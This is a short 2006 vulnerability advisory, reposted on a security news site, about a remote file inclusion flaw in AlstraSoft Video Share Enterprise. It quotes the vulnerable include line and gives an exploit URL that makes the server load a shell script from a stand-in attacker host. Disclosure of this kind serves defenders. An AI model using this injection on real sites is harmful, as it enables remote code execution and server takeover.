Computer Security

Security Advisory: AlstraSoft Video Share Enterprise Remote File Include Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21648] Fotopholder "path" Cross-Site Scripting Vulnerability

  [Full-disclosure] [vuln.sg] Cybozu Garoon 2 SQL Injection Vulnerabilities

  [Full-disclosure] [vuln.sg] Cybozu Products Arbitrary File Retrieval Vulnerability

  eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

From:night_warrior-_(at)_hotmail.com <night_warrior-_(at)_hotmail.com>
Date:28.08.2006
Subject:AlstraSoft Video Share Enterprise Remote File Include Vulnerability

##Night_Warrior<Kurdish Hacker>
##night_warrior-[at]hotmail.com
##AlstraSoft Video Share Enterprise Remote File Include Vulnerability
##Contact : night_warrior-[at]hotmail.com
##hompage : www.alstrasoft.com
##vuln code :
myajaxphp.php line 11

require_once($config['BASE_DIR'] . "/ajax/cpaint2.inc.php");

http://www.example.com/[Script Path]/ajax/myajaxphp.php?config[BASE_DIR]=http://atacker.com/shell.txt?
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru